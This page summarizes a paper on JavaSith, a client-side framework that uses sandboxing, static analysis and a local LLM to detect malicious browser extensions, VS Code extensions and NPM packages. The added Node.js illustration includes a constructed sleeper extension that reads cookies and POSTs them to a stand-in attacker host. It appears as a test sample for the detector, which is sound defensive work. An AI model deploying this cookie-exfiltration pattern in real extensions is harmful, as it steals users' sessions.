JavaSith: A Client-Side Framework for Analyzing Potentially Malicious Extensions in Browsers, VS Code, and NPM Packages

Avihay Cohen

TL;DR

JavaSith tackles the rising risk of malicious code hidden in trusted extension ecosystems by delivering a client-side framework that performs end-to-end analysis of browser extensions, VSCode extensions, and NPM packages. It combines a fully in-browser runtime sandbox with time-accelerated execution, static analysis (including Retire.js-based vulnerability checks and heuristic pattern detection), and an on-device WebLLM that interprets findings and metadata. The system also includes a GUI for interactive review and provides case studies showing detection of cookie theft, cryptomining payloads, and information exfiltration, all while preserving user privacy by avoiding cloud-based analysis. Collectively, JavaSith demonstrates that a multi-technique, client-side approach can effectively reveal stealthy malicious behaviors that often bypass traditional defenses, offering a practical tool for developers and enterprises to vet extensions before trust is granted.

Abstract

Modern software supply chains face an increasing threat from malicious code hidden in trusted components such as browser extensions, IDE extensions, and open-source packages. This paper introduces JavaSith, a novel client-side framework for analyzing potentially malicious extensions in web browsers, Visual Studio Code (VSCode), and Node's NPM packages. JavaSith combines a runtime sandbox that emulates browser/Node.js extension APIs (with a "time machine" to accelerate time-based triggers) with static analysis and a local large language model (LLM) to assess risk from code and metadata. We present the design and architecture of JavaSith, including techniques for intercepting extension behavior over simulated time and extracting suspicious patterns. Through case studies on real-world attacks (such as a supply-chain compromise of a Chrome extension and malicious VSCode extensions installing cryptominers), we demonstrate how JavaSith can catch stealthy malicious behaviors that evade traditional detection. We evaluate the framework's effectiveness and discuss its limitations and future enhancements. JavaSith's client-side approach empowers end users and organizations to vet extensions and packages before integrating them into their environments.
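As an added illustration of the abstract's "time machine" idea (example code written for this page, not JavaSith's own implementation), the following Node.js sketch replaces setTimeout and Date.now with a virtual clock so that a constructed sleeper extension, which waits seven days before reading cookies and posting them off-host, is observed in milliseconds of real time. The emulated chrome.cookies and fetch stubs, and the finding rule at the end, are assumptions made for the example.

```javascript
// Added example (not JavaSith's code): a minimal "time machine" sandbox in Node.js.
// A virtual clock replaces setTimeout/Date.now, so timers set for days in the
// future fire immediately in real time and the API calls they trigger are logged.
function runInTimeMachine(extensionSource, maxVirtualMs) {
  let now = 0;          // virtual milliseconds since the sandbox started
  let nextId = 1;
  const timers = [];    // pending { id, at, fn }
  const log = [];       // observed API calls with virtual timestamps

  // Hypothetical emulated APIs: each records the call instead of performing it.
  const env = {
    setTimeout(fn, delay) { const id = nextId++; timers.push({ id, at: now + (delay || 0), fn }); return id; },
    Date: { now: () => now },
    fetch(url, opts) {
      log.push({ t: now, api: 'fetch', url, method: (opts && opts.method) || 'GET' });
      return Promise.resolve({ ok: true });
    },
    chrome: { cookies: { getAll(query, cb) {
      log.push({ t: now, api: 'cookies.getAll', domain: query.domain });
      cb([{ name: 'sid', value: 'FAKE-VALUE' }]);   // constructed fake cookie jar
    } } },
  };

  // Run the extension body with the emulated globals shadowing the real ones.
  new Function('setTimeout', 'Date', 'fetch', 'chrome', extensionSource)(
    env.setTimeout, env.Date, env.fetch, env.chrome);

  // Fast-forward: jump straight to the earliest pending timer, up to the window limit.
  while (timers.length) {
    timers.sort((a, b) => a.at - b.at);
    const next = timers.shift();
    if (next.at > maxVirtualMs) break;
    now = next.at;
    next.fn();
  }
  return { virtualMsElapsed: now, log };
}

// Constructed sample: a sleeper extension that idles for 7 days, then reads cookies
// and POSTs them to an external host (the cookie-theft pattern the paper describes).
const SLEEPER_EXTENSION = `
  setTimeout(function () {
    chrome.cookies.getAll({ domain: 'example.com' }, function (cookies) {
      fetch('https://attacker.invalid/collect', { method: 'POST', body: JSON.stringify(cookies) });
    });
  }, 7 * 24 * 60 * 60 * 1000);
`;

// Assumed heuristic: cookie read followed by an outbound POST is flagged as exfiltration.
function suspiciousFindings(result) {
  const readCookies = result.log.some(e => e.api === 'cookies.getAll');
  const externalPost = result.log.some(e => e.api === 'fetch' && e.method === 'POST');
  return readCookies && externalPost ? ['cookie-exfiltration'] : [];
}
```

Running the sleeper with a 30-day virtual window surfaces both calls at virtual time 604800000 ms; with a one-minute window (what a naive real-time sandbox would observe) the log stays empty.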

Paper Structure

This paper contains 31 sections and 3 figures.

Figures (3)

  • Figure 1: High-level architecture of JavaSith. The framework ingests extension or package code, then performs static analysis, dynamic execution in a sandbox (with time simulation), and LLM-based evaluation. A GUI allows the user to review detailed findings.
  • Figure 2: High-level architecture of JavaSith Novel Sandbox.
  • Figure 10: LLM Analysis Tab